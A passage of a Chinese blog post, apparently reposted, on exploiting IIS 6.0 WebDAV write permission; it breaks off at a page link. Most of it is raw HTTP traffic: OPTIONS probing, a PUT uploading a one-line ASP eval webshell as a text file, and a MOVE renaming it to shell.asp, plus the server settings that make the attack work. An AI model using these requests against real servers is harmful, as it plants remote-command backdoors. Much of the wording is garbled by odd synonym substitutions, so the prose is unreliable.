IIS可以PUT,但无法MOVE的缘由[网络技术]

本日在测试IIS的put漏洞时,发现可以put全部IIS的不能解析的文件,move也正常,但是却无法move为asp、asa等IIS可以解析的文件,在网上搜索了一段文章后,发现是因为IIS的配置中,没有选上上“脚本资源拜候”所致.普通情形下IIS的配置城市选上这个,但是就让我碰上了,下面这篇文章对这类问题举行了具体的阐明,转过来记录下.

原文地址:小议IIS的特别权限
写了《小议IIS的特别权限》一文之后,在一次实行室内部报告中,我给大家演示了IIS写权限的操纵,但是却没有成功,很烦闷啊.明显我之前都测试过的,怎么会不行了呢?看来必定是IIS配置的问题了.那次演示我用的是新装的Win2003虚拟机,IIS采取的默许的设置,勾选上了主目录标签页下的“写入”复选框.失利的两个地方:
（1）OPTIONS 号令无法查看IIS支持的办法调集.

提 交以下报文:

OPTIONS / HTTP/1.1
Host: www.redicecn.cn

返回以下报文:

HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD
Content-Length: 0
Server: Microsoft-IIS/6.0
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET
Date: Fri, 01 Jan 2010 07:39:56 GMT

注释:没有返回IIS 支持的办法调集.

（2）PUT asp文件及txt文件均失利.

提交以下报文:

PUT /test.txt HTTP/1.1
Host: www.redicecn.cn
Content-Length: 26

<%eval(request(“cmd”))%>

返回以下报文:

HTTP/1.1 501 Not Implemented
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Jan 2010 07:50:53 GMT

注释:没有成功写入.

提交以下报文:

PUT /test.asp HTTP/1.1
Host: www.redicecn.cn
Content-Length: 26

<%eval(request(“cmd”))%>

返回以下报文:

HTTP/1.1 404 Not Found
Content-Length: 83
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Jan 2010 07:43:07 GMT

<html><head><title>Error</title>< /head><body>系统找不到指定的文件.
</body></html>

注 释:没有成功写入.

问题的办理:

本日忽然在IIS的“Web服务扩大”列表中看到了“WebDAV”是被禁用 的,会不会是因为“WebDAV”被禁用了的缘由呢?
启用“WebDAV”,哈哈,竟然成功了,公然是“WebDAV”被禁用了的缘由.

再 次提交以下报文（OPTIONS号令）:

OPTIONS / HTTP/1.1
Host: www.redicecn.cn

返回以下报文:

HTTP/1.1 200 OK
Date: Fri, 01 Jan 2010 07:54:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Cache-Control: private

注释:IIS成功返回支持的办法调集.

再 次提交以下报文:

PUT /test.txt HTTP/1.1
Host: www.redicecn.cn
Content-Length: 26

<%eval(request(“cmd”))%>

返 回以下报文:

HTTP/1.1 201 Created
Date: Fri, 01 Jan 2010 07:57:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.redicecn.cn/test.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

成功在IIS根目录写入了 test.txt文件.但是直接PUT asp文件还是返回一样的错误信息.小黑们普通采取的办法就是先PUT txt马,然后利用MOVE办法将txt马改名成asp马.

尝试提交以下报文:

MOVE /test.txt HTTP/1.1
Host: www.redicecn.cn
Destination: http://www.redicecn.cn/shell.asp

返 回以下报文:

HTTP/1.1 207 Multi-Status
Date: Fri, 01 Jan 2010 08:02:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.redicecn.cn/shell.asp
Content-Type: text/xml
Transfer-Encoding: chunked

b8
<?xml version=”1.0″?><a:multistatus xmlns:a=”DAV:”><a:response><a:href>http://www.redicecn.cn/shell.asp</a:href><a:status>HTTP/1.1 403 Forbidden</a:status></a:response></a:multistatus>
0

注 释:失利了,忧郁啊.看来IIS上还有什么机关啊.陷入僵局….

2010年的早晨我翻了一下《黑客浸透笔记》（知识型地痞给我的,他 的朋友冰的原点写的书,送了他两本）,在《深化解析IIS写权限》一节中,我发现作者碰到了和我一样的问题,他给出的办理筹划是勾选“脚本资源拜候”复选 框.测试一下:

提交以下报文:

MOVE /test.txt HTTP/1.1

[1] [2]  下一页